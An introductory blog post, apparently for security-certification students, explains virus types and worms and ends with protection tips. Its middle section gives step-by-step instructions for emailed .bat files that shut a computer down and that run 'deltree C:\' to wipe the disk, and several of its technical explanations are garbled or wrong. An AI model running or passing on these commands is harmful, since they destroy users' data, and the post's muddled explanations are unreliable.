Virus and Worm

      Virus and worm

I welcome all my readers to this blog, today we will talk about few important types of malware, this blog will be helpful for all students who wants to learn about cyber security, or want to complete certification like Comp TIA Security+ or CEH.

Introduction:

Malware is a software design to damage a computer (workstation, mobile, server or network), it can delete the data, modify the data or encrypt the data, and it can change the setting of your computer or registry and can spy data from the system.

Types of malware:

Virus and worms

Ransomware and crypto malware

Trojan and RATS

Rootkits

Keyloggers

Adware and Spyware

Bot and Botnets

We will now discuss each one of it one by one.  In this blog we will start with virus and Worms, and I will try to cover all malware one by one in my coming blogs.  Now let’s start with virus

Virus:

The name virus is used from the medical field because computer virus behavior is similar to a virus (It replicates itself). We just need to run a program and then it can replicate itself and it can spread itself by file system or network, sometimes a virus may not cause a problem, and sometimes it can be a disaster. The first virus detected on ARPANET (ARPANET was the network that became the basis for the Internet, in 1970) and its name was Creeper.

These days virus are very common every day thousand of virus are created and spread around globe.

Types of Virus:

Program Virus

Boot sector virus

Script virus

Macro virus

Encrypted virus:  

Polymorphic Virus:  

1. Program Virus: 

These are the part of application, email attachment, or storage media like CD,  floppy, and virus code are written hidden in it, it’s like a trogon and when we run application,when we open the attachment or when we play storage media its code work in background

2. Boot sector virus: 

These are the virus design to effect boot sector/ master boot Record (MBR) or external storage media like CD, floppy disk etc.

3. Script Virus: 

These are web based virus, which attack a computer with the help of a website. Sometimes a malicious website is designed to attack a system, by running script. We can understand it with an example when we download any file from a website or if we play any video on a website, a script can run in background which can be very harmful.

4. Macro virus: 

These are the virus that can be executed from executed files; the best example is Microsoft Office world file. Notepad files can also be used for this purpose, such virus is spread by using email with the attachment. These are the .bat files that excite its code when we click on it. We always suppose to check file extension before exciting it.

5. Encrypted virus:

Attacker send the virus code in encrypted form, so that it cannot be easily detected, in most cases it carry decryption algorithms as well, so that  when it reaches the target the decryption  algorithm code decrypt the file code for execution.

6. Polymorphic Virus: 

Polymorphic means (occurring in several different forms, in particular with reference to species or genetic variation) we have studied about it in biology and chemistry in our days, the best example is in biology is phenotype , now it’s time to read polymorphic in computer science.

Traditional antivirus works on signature base, so attacker use polymorphic property in coding so that if antivirus detect its signature, it changes its signature in next installation so that antivirus should not detect it.  

I have explained the types of virus, Apart from these we can also categorize virus like Armored Virus, Multipartite Virus, Tunneling Virus, Stealth Virus but these are made based on different types of technique used by virus and I think I do not need to explain that much here.   

  

Now we will take an example how attacker can write a program to create a virus and how attacker can spread it, I request from my readers to not apply this technique on anyone because it’s illegal, I am writing this blog just for education purpose.

The best example is the .bat file extension program, attacker can spread these file by an attachment in the email.

Below are the steps:

1. Open notepad file.

2. Write the below code.

@echo off

Shut down -s -t 00

3. Save the file with .bat extension

4. And run it just by double clicking it

the command “shutdown -s –t 00 shutdown the computer each time when it starts, so user can never start the computer normally and it may cause to loss data.

Other example is

@echo off

deltree C:\

It will delete files permanently from the hard disk.

How can we protect our computer from virus attack

The best way is to use antivirus with latest virus definition, the antivirus contain signatures of all the virus detected and protect your machine from such virus.

1.          Use firewall
2.          Use authenticated website
3.          Always download from file, video or other documents from good source
4.          Use emails carefully and do not open attachment from unknown email

If you want to know more about how to protect your machine please read my blog:

How to protect computer from virus attack

Worm: A computer worm is self-replicating malware that duplicates itself to spread to uninfected computers. It can move from one system to another or from one network to other network without human intervention. It uses network as transmission and that’s why it spread quickly.

How we can protect our computer from worm ?

We can use firewall to protect out network from worm, apart from this we can use antivirus with latest signature update.

The main difference between virus and worm

Virus	Worm
It needs human intervention	It do not need human intervention
Virus is slower than worm,	It effects more faster than virus
Antivirus plays a very important role to protect our environment from virus	Antivirus and firewall  play important role to protect from worm
Virus main impact is, it delete a file, corrupt a file.	Main purpose of worm is to slowdown the network or system.